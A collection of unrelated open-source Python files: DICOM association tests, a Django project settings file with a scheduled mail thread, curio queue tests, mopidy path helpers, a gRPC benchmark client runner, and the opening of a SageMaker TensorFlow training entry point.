contexts = []
for ii in range(128):
contexts.append(build_context(str(ii)))
self.ae.requested_contexts = contexts
assert len(self.ae.requested_contexts) == 128
contexts.append(build_context("129"))
with pytest.raises(ValueError):
self.ae.requested_contexts = contexts
def test_remove_requested_context_str(self):
"""Tests for AE.remove_requested_context using str."""
# Test singular
self.ae.add_requested_context("1.2.840.10008.1.1")
context = self.ae.requested_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
self.ae.remove_requested_context("1.2.840.10008.1.1")
assert len(self.ae.requested_contexts) == 0
# Test multiple
self.ae.add_requested_context("1.2.840.10008.1.1")
self.ae.add_requested_context("1.2.840.10008.1.1", ["1.2.3.4"])
self.ae.add_requested_context("1.2.840.10008.1.4", ["1.2.3.4"])
assert len(self.ae.requested_contexts) == 3
self.ae.remove_requested_context("1.2.840.10008.1.1")
assert len(self.ae.requested_contexts) == 1
for context in self.ae.requested_contexts:
assert context.abstract_syntax != "1.2.840.10008.1.1"
def test_remove_requested_context_uid(self):
"""Tests for AE.remove_requested_context using UID."""
self.ae.add_requested_context("1.2.840.10008.1.1")
context = self.ae.requested_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
self.ae.remove_requested_context(UID("1.2.840.10008.1.1"))
assert len(self.ae.requested_contexts) == 0
def test_remove_requested_context_sop_class(self):
"""Tests for AE.remove_requested_context using SOPClass."""
self.ae.add_requested_context(RTImageStorage)
context = self.ae.requested_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.5.1.4.1.1.481.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
self.ae.remove_requested_context(RTImageStorage)
assert len(self.ae.requested_contexts) == 0
def test_remove_requested_context_default(self):
"""Tests for AE.remove_requested_context with default transfers."""
self.ae.add_requested_context("1.2.840.10008.1.1")
context = self.ae.requested_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert len(context.transfer_syntax) == 4
self.ae.remove_requested_context("1.2.840.10008.1.1")
assert len(self.ae.requested_contexts) == 0
def test_remove_requested_context_single(self):
"""Tests for AE.remove_requested_context with single transfer."""
self.ae.add_requested_context("1.2.840.10008.1.1")
context = self.ae.requested_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert len(context.transfer_syntax) == 4
self.ae.remove_requested_context(
"1.2.840.10008.1.1", DEFAULT_TRANSFER_SYNTAXES[0]
)
context = self.ae.requested_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES[1:]
def test_remove_requested_context_partial(self):
"""Tests for AE.remove_supported_context with partial transfers."""
# Test singular
self.ae.add_requested_context("1.2.840.10008.1.1")
context = self.ae.requested_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert len(context.transfer_syntax) == 4
self.ae.remove_requested_context("1.2.840.10008.1.1", ["1.2.840.10008.1.2"])
assert len(self.ae.requested_contexts) == 1
context = self.ae.requested_contexts[0]
assert len(context.transfer_syntax) == 3
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES[1:]
assert context.abstract_syntax == "1.2.840.10008.1.1"
self.ae.remove_requested_context("1.2.840.10008.1.1")
assert len(self.ae.requested_contexts) == 0
# Test multiple
self.ae.add_requested_context("1.2.840.10008.1.1")
self.ae.add_requested_context(RTImageStorage)
self.ae.add_requested_context("1.2.840.10008.1.1", ["1.2.3.4"])
self.ae.remove_requested_context("1.2.840.10008.1.1", ["1.2.840.10008.1.2"])
assert len(self.ae.requested_contexts) == 3
context = self.ae.requested_contexts[0]
assert len(context.transfer_syntax) == 3
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES[1:]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert (
self.ae.requested_contexts[1].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
)
assert self.ae.requested_contexts[2].transfer_syntax == ["1.2.3.4"]
assert self.ae.requested_contexts[2].abstract_syntax == "1.2.840.10008.1.1"
self.ae.remove_requested_context("1.2.840.10008.1.1")
assert len(self.ae.requested_contexts) == 1
assert (
self.ae.requested_contexts[0].abstract_syntax
== "1.2.840.10008.5.1.4.1.1.481.1"
)
def test_remove_requested_context_all(self):
"""Tests for AE.remove_requested_context with all transfers."""
self.ae.add_requested_context("1.2.840.10008.1.1")
context = self.ae.requested_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert len(context.transfer_syntax) == 4
# Test singular
self.ae.remove_requested_context("1.2.840.10008.1.1", DEFAULT_TRANSFER_SYNTAXES)
assert len(self.ae.requested_contexts) == 0
# Test multiple
self.ae.add_requested_context(
"1.2.840.10008.1.1", [DEFAULT_TRANSFER_SYNTAXES[0]]
)
self.ae.add_requested_context(
"1.2.840.10008.1.1", DEFAULT_TRANSFER_SYNTAXES[1:]
)
self.ae.add_requested_context(RTImageStorage)
self.ae.remove_requested_context("1.2.840.10008.1.1", DEFAULT_TRANSFER_SYNTAXES)
assert len(self.ae.requested_contexts) == 1
context = self.ae.requested_contexts[0]
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert context.abstract_syntax == "1.2.840.10008.5.1.4.1.1.481.1"
def test_remove_requested_context_all_plus(self):
"""Test remove_requested_context with extra transfers"""
tsyntax = DEFAULT_TRANSFER_SYNTAXES[:]
tsyntax.append("1.2.3")
# Test singular
self.ae.add_requested_context("1.2.840.10008.1.1")
context = self.ae.requested_contexts[0]
assert context.abstract_syntax == "1.2.840.10008.1.1"
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert len(context.transfer_syntax) == 4
self.ae.remove_requested_context("1.2.840.10008.1.1", tsyntax)
assert len(self.ae.requested_contexts) == 0
# Test multiple
self.ae.add_requested_context(
"1.2.840.10008.1.1", [DEFAULT_TRANSFER_SYNTAXES[0]]
)
self.ae.add_requested_context(
"1.2.840.10008.1.1", DEFAULT_TRANSFER_SYNTAXES[1:]
)
self.ae.add_requested_context(RTImageStorage)
self.ae.remove_requested_context("1.2.840.10008.1.1", tsyntax)
assert len(self.ae.requested_contexts) == 1
context = self.ae.requested_contexts[0]
assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES
assert context.abstract_syntax == "1.2.840.10008.5.1.4.1.1.481.1"
|
settings_20210906113314.py
|
"""
Django settings for First_Wish project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
import environ
import threading
import schedule
import time
from First_Wish_Main_App.views import decrease_day_count_and_send_bday_mails
env_path = os.path.join(os.path.dirname(__file__), '../.env')
environ.Env.read_env(env_path)
# ///////////////////////////////SCHEDULE THE decrease_day_count_and_send_bday_mails ////////////////////
# Schedule the task at 00:01 everyday
schedule.every().day.at("11:32").do(decrease_day_count_and_send_bday_mails)
# schedule.every().day.at("01:00").do(delete_task_and_add_store_datewise)
def func():
while True:
print("======Runnning==========")
schedule.run_pending()
time.sleep(1)
t1 = threading.Thread(target=func)
t1.start()
# ///////////////////////////////SCHEDULE THE ENABLE BUTTON ENDS////////////////////
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
templates_path=os.path.join(BASE_DIR,'templates')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY =os.environ.get('DJANGO_SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'First_Wish_Main_App',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'First_Wish.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [templates_path],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'First_Wish.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Kolkata'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
|
test_queue.py
|
# test_queue.py
from collections import deque
from curio import *
import time
import threading
from curio.traps import _read_wait
def test_queue_simple(kernel):
results = []
async def consumer(queue, label):
while True:
item = await queue.get()
if item is None:
break
results.append((label, item))
await queue.task_done()
await queue.task_done()
results.append(label + ' done')
async def producer():
queue = Queue()
results.append('producer_start')
await spawn(consumer(queue, 'cons1'))
await spawn(consumer(queue, 'cons2'))
await sleep(0.1)
for n in range(4):
await queue.put(n)
await sleep(0.1)
for n in range(2):
await queue.put(None)
results.append('producer_join')
await queue.join()
results.append('producer_done')
kernel.run(producer())
assert results == [
'producer_start',
('cons1', 0),
('cons2', 1),
('cons1', 2),
('cons2', 3),
'producer_join',
'cons1 done',
'cons2 done',
'producer_done',
]
def test_queue_simple_iter(kernel):
results = []
async def consumer(queue, label):
async for item in queue:
if item is None:
break
results.append((label, item))
await queue.task_done()
await queue.task_done()
results.append(label + ' done')
async def producer():
queue = Queue()
results.append('producer_start')
await spawn(consumer(queue, 'cons1'))
await spawn(consumer(queue, 'cons2'))
await sleep(0.1)
for n in range(4):
await queue.put(n)
await sleep(0.1)
for n in range(2):
await queue.put(None)
results.append('producer_join')
await queue.join()
results.append('producer_done')
kernel.run(producer())
assert results == [
'producer_start',
('cons1', 0),
('cons2', 1),
('cons1', 2),
('cons2', 3),
'producer_join',
'cons1 done',
'cons2 done',
'producer_done',
]
def test_queue_unbounded(kernel):
results = []
async def consumer(queue, label):
while True:
item = await queue.get()
if item is None:
break
results.append((label, item))
await queue.task_done()
await queue.task_done()
results.append(label + ' done')
async def producer():
queue = Queue()
results.append('producer_start')
await spawn(consumer(queue, 'cons1'))
await sleep(0.1)
for n in range(4):
await queue.put(n)
await queue.put(None)
results.append('producer_join')
await queue.join()
results.append('producer_done')
kernel.run(producer())
assert results == [
'producer_start',
'producer_join',
('cons1', 0),
('cons1', 1),
('cons1', 2),
('cons1', 3),
'cons1 done',
'producer_done',
]
def test_queue_bounded(kernel):
results = []
async def consumer(queue, label):
while True:
item = await queue.get()
if item is None:
break
results.append((label, item))
await sleep(0.1)
await queue.task_done()
await queue.task_done()
results.append(label + ' done')
async def producer():
queue = Queue(maxsize=2)
results.append('producer_start')
await spawn(consumer(queue, 'cons1'))
await sleep(0.1)
for n in range(4):
await queue.put(n)
results.append(('produced', n))
await queue.put(None)
results.append('producer_join')
await queue.join()
results.append('producer_done')
kernel.run(producer())
assert results == [
'producer_start',
('produced', 0),
('produced', 1),
('cons1', 0),
('produced', 2),
('cons1', 1),
('produced', 3),
('cons1', 2),
'producer_join',
('cons1', 3),
'cons1 done',
'producer_done',
]
def test_queue_get_cancel(kernel):
# Make sure a blocking get can be cancelled
results = []
async def consumer():
queue = Queue()
try:
results.append('consumer waiting')
item = await queue.get()
results.append('not here')
except CancelledError:
results.append('consumer cancelled')
async def driver():
task = await spawn(consumer())
await sleep(0.5)
await task.cancel()
kernel.run(driver())
assert results == [
'consumer waiting',
'consumer cancelled'
]
def test_queue_put_cancel(kernel):
# Make sure a blocking put() can be cancelled
results = []
async def producer():
queue = Queue(1)
results.append('producer_start')
await queue.put(0)
try:
await queue.put(1)
results.append('not here')
except CancelledError:
results.append('producer_cancel')
async def driver():
task = await spawn(producer())
await sleep(0.5)
await task.cancel()
kernel.run(driver())
assert results == [
'producer_start',
'producer_cancel'
]
def test_queue_get_timeout(kernel):
# Make sure a blocking get respects timeouts
results = []
async def consumer():
queue = Queue()
try:
results.append('consumer waiting')
item = await timeout_after(0.5, queue.get())
results.append('not here')
except TaskTimeout:
results.append('consumer timeout')
kernel.run(consumer())
assert results == [
'consumer waiting',
'consumer timeout'
]
def test_queue_put_timeout(kernel):
# Make sure a blocking put() respects timeouts
results = []
async def producer():
queue = Queue(1)
results.append('producer start')
await queue.put(0)
try:
await timeout_after(0.5, queue.put(1))
results.append('not here')
except TaskTimeout:
results.append('producer timeout')
kernel.run(producer())
assert results == [
'producer start',
'producer timeout'
]
def test_queue_qsize(kernel):
async def main():
q = Queue()
repr(q)
await q.put(1)
assert q.qsize() == 1
kernel.run(main)
def test_priority_queue(kernel):
results = []
priorities = [4, 2, 1, 3]
async def consumer(queue):
while True:
item = await queue.get()
if item[1] is None:
break
results.append(item[1])
await queue.task_done()
await sleep(0.2)
await queue.task_done()
async def producer():
queue = PriorityQueue()
for n in priorities:
await queue.put((n, n))
await queue.put((10, None))
await spawn(consumer(queue))
await queue.join()
kernel.run(producer())
assert results == sorted(priorities)
def test_lifo_queue(kernel):
results = []
items = range(4)
async def consumer(queue):
while True:
item = await queue.get()
if item is None:
break
results.append(item)
await queue.task_done()
await sleep(0.2)
await queue.task_done()
async def producer():
queue = LifoQueue()
await queue.put(None)
for n in items:
await queue.put(n)
await spawn(consumer(queue))
await queue.join()
kernel.run(producer())
assert results == list(reversed(items))
def test_univ_queue_basic(kernel):
q = UniversalQueue()
assert q.empty()
assert q.qsize() == 0
assert not q.full()
def test_univ_queue_sync_async(kernel):
result = [ ]
async def consumer(q):
while True:
item = await q.get()
if item is None:
break
result.append(item)
await q.task_done()
def producer(q):
for i in range(10):
q.put(i)
time.sleep(0.1)
q.join()
assert True
async def main():
q = UniversalQueue()
t1 = await spawn(consumer(q))
t2 = threading.Thread(target=producer, args=(q,))
t2.start()
await run_in_thread(t2.join)
await q.put(None)
await t1.join()
assert result == [0,1,2,3,4,5,6,7,8,9]
kernel.run(main())
def test_univ_queue_async_sync(kernel):
result = []
def consumer(q):
while True:
item = q.get()
if item is None:
break
result.append(item)
q.task_done()
async def producer(q):
for i in range(10):
await q.put(i)
await sleep(0.1)
await q.join()
async def main():
q = UniversalQueue()
t1 = threading.Thread(target=consumer, args=(q,))
t1.start()
t2 = await spawn(producer(q))
await t2.join()
await q.put(None)
await run_in_thread(t1.join)
assert result == [0,1,2,3,4,5,6,7,8,9]
kernel.run(main())
def test_univ_queue_cancel(kernel):
result = []
async def consumer(q):
while True:
try:
item = await timeout_after(0.1, q.get())
except TaskTimeout:
continue
if item is None:
break
result.append(item)
await q.task_done()
def producer(q):
for i in range(10):
q.put(i)
time.sleep(0.2)
q.join()
async def main():
q = UniversalQueue(maxsize=2)
t1 = await spawn(consumer(q))
t2 = threading.Thread(target=producer, args=(q,))
t2.start()
await run_in_thread(t2.join)
await q.put(None)
await t1.join()
assert result == [0,1,2,3,4,5,6,7,8,9]
kernel.run(main())
def test_univ_queue_multiple_consumer(kernel):
result = []
async def consumer(q):
while True:
item = await q.get()
if item is None:
break
result.append(item)
await q.task_done()
def producer(q):
for i in range(1000):
q.put(i)
q.join()
async def main():
q = UniversalQueue(maxsize=10)
t1 = await spawn(consumer(q))
t2 = await spawn(consumer(q))
t3 = await spawn(consumer(q))
t4 = threading.Thread(target=producer, args=(q,))
t4.start()
await run_in_thread(t4.join)
await q.put(None)
await q.put(None)
await q.put(None)
await t1.join()
await t2.join()
await t3.join()
assert list(range(1000)) == sorted(result)
kernel.run(main())
def test_univ_queue_multiple_kernels(kernel):
result = []
async def consumer(q):
while True:
item = await q.get()
if item is None:
break
result.append(item)
await q.task_done()
def producer(q):
for i in range(1000):
q.put(i)
q.join()
async def main():
q = UniversalQueue(maxsize=10)
t1 = threading.Thread(target=run, args=(consumer(q),))
t1.start()
t2 = threading.Thread(target=run, args=(consumer(q),))
t2.start()
t3 = threading.Thread(target=run, args=(consumer(q),))
t3.start()
t4 = threading.Thread(target=producer, args=(q,))
t4.start()
await run_in_thread(t4.join)
await q.put(None)
await q.put(None)
await q.put(None)
t1.join()
t2.join()
t3.join()
assert list(range(1000)) == sorted(result)
kernel.run(main())
def test_univ_queue_withfd(kernel):
result = [ ]
async def consumer(q):
while True:
await _read_wait(q)
item = await q.get()
if item is None:
break
result.append(item)
await q.task_done()
def producer(q):
for i in range(10):
q.put(i)
time.sleep(0.1)
q.join()
assert True
async def main():
q = UniversalQueue(withfd=True)
t1 = await spawn(consumer(q))
t2 = threading.Thread(target=producer, args=(q,))
t2.start()
await run_in_thread(t2.join)
await q.put(None)
await t1.join()
assert result == [0,1,2,3,4,5,6,7,8,9]
kernel.run(main())
def test_uqueue_simple_iter(kernel):
async def consumer(queue):
results = []
async for item in queue:
if item is None:
break
results.append(item)
assert results == list(range(10))
def tconsumer(queue):
results = []
for item in queue:
if item is None:
break
results.append(item)
assert results == list(range(10))
async def producer():
queue = UniversalQueue()
t = await spawn(consumer, queue)
for n in range(10):
await queue.put(n)
await queue.put(None)
await t.join()
t = threading.Thread(target=tconsumer, args=(queue,))
t.start()
for n in range(10):
await queue.put(n)
await queue.put(None)
await run_in_thread(t.join)
kernel.run(producer())
def test_uqueue_asyncio_iter(kernel):
async def consumer(queue):
results = []
async for item in queue:
if item is None:
break
results.append(item)
assert results == list(range(10))
async def producer():
queue = UniversalQueue(maxsize=2)
async with AsyncioLoop() as loop:
t = await spawn(loop.run_asyncio(consumer, queue))
for n in range(10):
await queue.put(n)
await queue.put(None)
await t.join()
kernel.run(producer())
def test_uqueue_asyncio_prod(kernel):
async def consumer():
queue = UniversalQueue(maxsize=2)
async with AsyncioLoop() as loop:
t = await spawn(loop.run_asyncio(producer, queue))
results = []
async for item in queue:
await queue.task_done()
if item is None:
break
results.append(item)
assert results == list(range(10))
await t.join()
async def producer(queue):
for n in range(10):
await queue.put(n)
await queue.put(None)
await queue.join()
kernel.run(consumer())
def test_uqueue_withfd_corner(kernel):
async def main():
queue = UniversalQueue(withfd=True)
await queue.put(1)
queue._get_sock.recv(1000) # Drain the socket
item = await queue.get()
assert item == 1
# Fill the I/O buffer
while True:
try:
queue._put_sock.send(b'x'*10000)
except BlockingIOError:
break
# Make sure this doesn't fail
await queue.put(2)
item = await queue.get()
assert item == 2
kernel.run(main)
def test_uqueue_put_cancel(kernel):
async def main():
queue = UniversalQueue(maxsize=1)
await queue.put(1)
try:
await timeout_after(0.1, queue.put(2))
assert False
except TaskTimeout:
assert True
kernel.run(main)
|
path.py
|
from __future__ import absolute_import, unicode_literals
import logging
import os
import re
import stat
import threading
from mopidy import compat, exceptions
from mopidy.compat import queue, urllib
from mopidy.internal import encoding, xdg
logger = logging.getLogger(__name__)
XDG_DIRS = xdg.get_dirs()
def get_or_create_dir(dir_path):
if not isinstance(dir_path, bytes):
raise TypeError('dir_path is not a bytestring: %r' % dir_path)
dir_path = expand_path(dir_path)
if os.path.isfile(dir_path):
raise OSError(
'A file with the same name as the desired dir, '
'"%s", already exists.' % dir_path)
elif not os.path.isdir(dir_path):
logger.info('Creating dir %s', dir_path)
os.makedirs(dir_path, 0o755)
return dir_path
def get_or_create_file(file_path, mkdir=True, content=None):
if not isinstance(file_path, bytes):
raise TypeError('file_path is not a bytestring: %r' % file_path)
file_path = expand_path(file_path)
if isinstance(content, compat.text_type):
content = content.encode('utf-8')
if mkdir:
get_or_create_dir(os.path.dirname(file_path))
if not os.path.isfile(file_path):
logger.info('Creating file %s', file_path)
with open(file_path, 'wb') as fh:
if content is not None:
fh.write(content)
return file_path
def get_unix_socket_path(socket_path):
match = re.search('^unix:(.*)', socket_path)
if not match:
return None
return match.group(1)
def path_to_uri(path):
"""
Convert OS specific path to file:// URI.
Accepts either unicode strings or bytestrings. The encoding of any
bytestring will be maintained so that :func:`uri_to_path` can return the
same bytestring.
Returns a file:// URI as an unicode string.
"""
if isinstance(path, compat.text_type):
path = path.encode('utf-8')
if compat.PY2:
path = urllib.parse.quote(path)
else:
path = urllib.parse.quote_from_bytes(path)
return urllib.parse.urlunsplit(('file', '', path, '', ''))
def uri_to_path(uri):
"""
Convert an URI to a OS specific path.
Returns a bytestring, since the file path can contain chars with other
encoding than UTF-8.
If we had returned these paths as unicode strings, you wouldn't be able to
look up the matching dir or file on your file system because the exact path
would be lost by ignoring its encoding.
"""
if compat.PY2:
if isinstance(uri, compat.text_type):
uri = uri.encode('utf-8')
return urllib.parse.unquote(urllib.parse.urlsplit(uri).path)
else:
return urllib.parse.unquote_to_bytes(urllib.parse.urlsplit(uri).path)
def split_path(path):
if not isinstance(path, bytes):
raise TypeError('path is not a bytestring: %r' % path)
parts = []
while True:
path, part = os.path.split(path)
if part:
parts.insert(0, part)
if not path or path == b'/':
break
return parts
def expand_path(path):
# TODO: document as we want people to use this.
if not isinstance(path, bytes):
raise TypeError('path is not a bytestring: %r' % path)
for xdg_var, xdg_dir in XDG_DIRS.items():
var = ('$' + xdg_var).encode('utf-8')
path = path.replace(var, xdg_dir)
if b'$' in path:
return None
path = os.path.expanduser(path)
path = os.path.abspath(path)
return path
def _find_worker(relative, follow, done, work, results, errors):
"""Worker thread for collecting stat() results.
:param str relative: directory to make results relative to
:param bool follow: if symlinks should be followed
:param threading.Event done: event indicating that all work has been done
:param queue.Queue work: queue of paths to process
:param dict results: shared dictionary for storing all the stat() results
:param dict errors: shared dictionary for storing any per path errors
"""
while not done.is_set():
try:
entry, parents = work.get(block=False)
except queue.Empty:
continue
if relative:
path = os.path.relpath(entry, relative)
else:
path = entry
try:
if follow:
st = os.stat(entry)
else:
st = os.lstat(entry)
if (st.st_dev, st.st_ino) in parents:
errors[path] = exceptions.FindError('Sym/hardlink loop found.')
continue
parents = parents + [(st.st_dev, st.st_ino)]
if stat.S_ISDIR(st.st_mode):
for e in os.listdir(entry):
work.put((os.path.join(entry, e), parents))
elif stat.S_ISREG(st.st_mode):
results[path] = st
elif stat.S_ISLNK(st.st_mode):
errors[path] = exceptions.FindError('Not following symlinks.')
else:
errors[path] = exceptions.FindError('Not a file or directory.')
except OSError as e:
errors[path] = exceptions.FindError(
encoding.locale_decode(e.strerror), e.errno)
finally:
work.task_done()
def _find(root, thread_count=10, relative=False, follow=False):
"""Threaded find implementation that provides stat results for files.
Tries to protect against sym/hardlink loops by keeping an eye on parent
(st_dev, st_ino) pairs.
:param str root: root directory to search from, may not be a file
:param int thread_count: number of workers to use, mainly useful to
mitigate network lag when scanning on NFS etc.
:param bool relative: if results should be relative to root or absolute
:param bool follow: if symlinks should be followed
"""
threads = []
results = {}
errors = {}
done = threading.Event()
work = queue.Queue()
work.put((os.path.abspath(root), []))
if not relative:
root = None
args = (root, follow, done, work, results, errors)
for i in range(thread_count):
t = threading.Thread(target=_find_worker, args=args)
t.daemon = True
t.start()
threads.append(t)
work.join()
done.set()
for t in threads:
t.join()
return results, errors
def find_mtimes(root, follow=False):
results, errors = _find(root, relative=False, follow=follow)
# return the mtimes as integer milliseconds
mtimes = {f: int(st.st_mtime * 1000) for f, st in results.items()}
return mtimes, errors
def is_path_inside_base_dir(path, base_path):
if not isinstance(path, bytes):
raise TypeError('path is not a bytestring')
if not isinstance(base_path, bytes):
raise TypeError('base_path is not a bytestring')
if compat.PY2:
path_separator = os.sep
else:
path_separator = os.sep.encode()
if path.endswith(path_separator):
raise ValueError(
'path %r cannot end with a path separator' % path)
# Expand symlinks
real_base_path = os.path.realpath(base_path)
real_path = os.path.realpath(path)
if os.path.isfile(path):
# Use dir of file for prefix comparision, so we don't accept
# /tmp/foo.m3u as being inside /tmp/foo, simply because they have a
# common prefix, /tmp/foo, which matches the base path, /tmp/foo.
real_path = os.path.dirname(real_path)
# Check if dir of file is the base path or a subdir
common_prefix = os.path.commonprefix([real_base_path, real_path])
return common_prefix == real_base_path
# FIXME replace with mock usage in tests.
class Mtime(object):
def __init__(self):
self.fake = None
def __call__(self, path):
if self.fake is not None:
return self.fake
return int(os.stat(path).st_mtime)
def set_fake_time(self, time):
self.fake = time
def undo_fake(self):
self.fake = None
mtime = Mtime()
|
client_runner.py
|
# Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Defines behavior for WHEN clients send requests.
Each client exposes a non-blocking send_request() method that the
ClientRunner invokes either periodically or in response to some event.
"""
import abc
import threading
import time
class ClientRunner:
"""Abstract interface for sending requests from clients."""
__metaclass__ = abc.ABCMeta
def __init__(self, client):
self._client = client
@abc.abstractmethod
def start(self):
raise NotImplementedError()
@abc.abstractmethod
def stop(self):
raise NotImplementedError()
class OpenLoopClientRunner(ClientRunner):
def __init__(self, client, interval_generator):
super(OpenLoopClientRunner, self).__init__(client)
self._is_running = False
self._interval_generator = interval_generator
self._dispatch_thread = threading.Thread(
target=self._dispatch_requests, args=())
def start(self):
self._is_running = True
self._client.start()
self._dispatch_thread.start()
def stop(self):
self._is_running = False
self._client.stop()
self._dispatch_thread.join()
self._client = None
def _dispatch_requests(self):
while self._is_running:
self._client.send_request()
time.sleep(next(self._interval_generator))
class ClosedLoopClientRunner(ClientRunner):
def __init__(self, client, request_count):
super(ClosedLoopClientRunner, self).__init__(client)
self._is_running = False
self._request_count = request_count
# Send a new request on each response for closed loop
self._client.add_response_callback(self._send_request)
def start(self):
self._is_running = True
self._client.start()
for _ in xrange(self._request_count):
self._client.send_request()
def stop(self):
self._is_running = False
self._client.stop()
self._client = None
def _send_request(self, client, response_time):
if self._is_running:
client.send_request()
|
train_entry_point.py
|
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
import argparse
import json
import os
import subprocess
import time
from threading import Thread
import tensorflow as tf
import container_support as cs
import tf_container.run
import tf_container.s3_fs as s3_fs
import tf_container.serve as serve
_logger = tf_container.run.get_logger()
def _wait_until_master_is_down(master):
while True:
try:
# this subprocess call is python 2/3 compatible and will throw an exception when the status code is != 0
subprocess.check_call(['curl', '{}:2222'.format(master)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
time.sleep(10)
except subprocess.CalledProcessError:
_logger.info("master {} is down, stopping parameter server".format(master))
return
def save_tf_config_env_var(tf_config):
os.environ['TF_CONFIG'] = json.dumps(tf_config)
_logger.info('----------------------TF_CONFIG--------------------------')
_logger.info(os.environ['TF_CONFIG'])
_logger.info('---------------------------------------------------------')
